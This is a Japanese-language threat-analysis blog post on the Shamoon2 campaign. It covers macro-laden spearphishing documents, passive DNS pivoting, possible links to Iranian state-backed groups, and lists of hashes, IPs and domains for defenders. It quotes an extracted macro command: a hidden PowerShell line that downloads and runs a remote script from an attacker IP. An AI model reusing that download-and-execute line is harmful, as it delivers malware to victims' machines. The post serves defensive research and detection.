Shamoon2についての新たな洞察

投稿者: Neal Dennis on 02/21/2017.
投稿アーカイブ:analysis, attack lifecycle, Interesting Research, Malware, threat analysis.

先日、IBMのアナリストたちが、攻撃者がサウジアラビアのシステムにShamoon2マルウェアを仕掛けたと思われる方法について、見解を初めて明らかにしました。研究者たちは、潜在的なマルウェアのライフサイクルがスピアフィッシングで始まり、最終的にShamoonとして知られるディスク消去マルウェアの展開につながると述べています。彼らの研究は、より大規模なマルウェアの拡散キャンペーンにつながる可能性がある一連のダウンローダーとドメインを示しています。

ASERTは、IBMのレポートにおける要因調査を行っている間に、さらに別の悪質なドメイン、IPアドレス、アーチファクトを発見しました。新しいドキュメントとPowerShellコンポーネントの基本機能は、以前明らかにされたものと一致しました。このマルウェアの総合能力の詳細は、IBMで継続中の研究をご参照ください。新たな手掛かりを提供することで、末端の調査員やネットワーク防御を担う人々がShamoon2と関連付けられた侵害を少しでも多く発見し、緩和できるようになることを期待しています。

最初の発見

以下の新しいサンプルは、同様のスピアフィッシング・キャンペーンを介して配信された可能性が高いとIBMの研究で述べられています。以下に挙げる3つの例はすべて、同じIPとURLを共有していました。これらのサンプルは、ドキュメント属性のピボッティングによって突き止められました。これについては、IBMのレポートのあるサンプルで、そのドキュメントの作成者が「gerry.knight」であることが明らかになったことから、以下の3例の追加サンプルの発見につながりました。

MD5

2a0df97277ddb361cecf8726df6d78ac
5e5ea1a67c2538dbc01df28e4ea87472
d30b8468d16b631cafe458fd94cc3196

IPs

104.218.120[.]128
69.87.223[.]26
5.254.100[.]200

URLs

analytics-google[.]org:69/checkFile.aspx
analytics-google[.]org
69.87.223[.]26:8080/p

以下は、サンプル5e5ea1a67c2538dbc01df28e4ea87472から取り込んだマクロ有効ドキュメントのスクリーンショットです。

抽出したこのマクロが有効になると、以下を実行します。

‘powershell.exe -w hidden -noni -nop -c “iex(New-Object System.Net.WebClient).DownloadString(\’http://69.87.223.26:8080/p\’)”‘

パッシブDNSのピボッティング

先のサンプルから、IPについてパッシブDNSの検索を実行しました。このキャンペーンが実行されていた2016年11月ごろには、get.adobe.go-microstf[.]comが104.218.120[.]128でホストされていたことが判明しました。

45.63.10[.]99でホストされていたドメインgo-microstf[.]comを調査すると、別のパターンの悪質な実行ファイルの存在が明らかになりました。このケースにおいては、PowerShellコンポーネントのダウンロードで使用されるURLは、IBMのレポートで判明した命名規則(http://69.87.223[.]26:8080/eiloShaegae1 )を共有しており、先の3つのサンプルで使用されていたIPアドレスに接続していました。以下はこのドメインに関連するIOC(Indicators of Compromise:侵害の形跡)です。

MD5

83be35956e5d409306a81e88a1dc89fd

IPs

45.63.10[.]99
69.87.223[.]26

URLs

go-microstf[.]com
69.87.223[.]26:8080/eiloShaegae1
go-microstf[.]com/checkfile.aspx

ドメインgo-microstf[.]comは、元々偽装のGoogle Analyticsログイン・ページに設定されていました。以下は、その悪質ドメインのスクリーンショットです。

イランの国家的支援を受けたKittenとのつながりの可能性

最後に、調査で比較的ユニークなサンプルが発見されました。この特殊なパターンは、2016年9月16日にVirusTotalへ提出されました。これまでの解析サンプルの大半は、提出時期が10月中旬以降であり、そのほとんどが2017年1月以降です。この特殊なバージョンは、analytics-google[.]orgへの接続を詳しく調べることで発見できました。新しいサンプルとは違い、このバージョンはユニークなファイル「sloo.exe」を生成するものでした。ファイルの生成場所はC:\Documents and Settings\Admin\Local Settings\Temp\sloo.exeです。このサンプルは、ファイル生成以外にも、PowerShell実行ファイルのために104.238.184[.]252に接続しました。

Palo Alto Networksの研究者たちは、aloo.exeとこれに関連付けられた行為を、おそらくイランの国家的支援を受けた攻撃者の仕業であるとみており、彼らはこの攻撃者を「Magic Hound」と名付けました。Magic Houndグループは、インフラとツールで攻撃者グループRocket Kittenと結び付いていますが、Palo Alto Networksは2つのグループのつながりの深さを確認できていません。

先日、Dell SecureWorksのアナリストが、IBMのレポートで取り上げられたドメインがイランのPuppyRATとつながっていたと結論付けました。また、Dellのアナリストは、これらの行為がイランの国家的支援によるものであるという見方に強い確信を持っています。

このバージョンのIOCは以下のとおりです。

MD5

07d6406036d6e06dc8019e3ade6ee7de

IPs

104.238.184[.]252
5.254.100[.]200

URLs

analytics-google[.]org:69/checkFile.aspx

結論

新たに見つかったこれらのIOCが、現在の脅威に対するさらなる手掛かりとなることが期待されます。潜在的なイランの攻撃者とのつながりは、Shamoon2がイランの国家的支援を受けた攻撃者による犯行であったとする進行中の分析を裏付けています。最後に取り上げたサンプルは、malware-0か、少なくとも、サウジアラビアのシステムにShamoonをインストールするために使用されるツールの全体的な開発とその導入の一部である可能性があります。

IOCの集約リスト:

MD5

2a0df97277ddb361cecf8726df6d78ac
5e5ea1a67c2538dbc01df28e4ea87472
d30b8468d16b631cafe458fd94cc3196
83be35956e5d409306a81e88a1dc89fd
07d6406036d6e06dc8019e3ade6ee7de

IPs

104.218.120[.]128
69.87.223[.]26
5.254.100[.]200
45.63.10[.]99
104.238.184[.]252

URLs

analytics-google[.]org:69/checkFile.aspx
analytics-google[.]org
69.87.223[.]26:8080/p
go-microstf[.]com
69.87.223[.]26:8080/eiloShaegae1
get.adobe.go-microstf[.]com
go-microstf[.]com/checkfile.aspx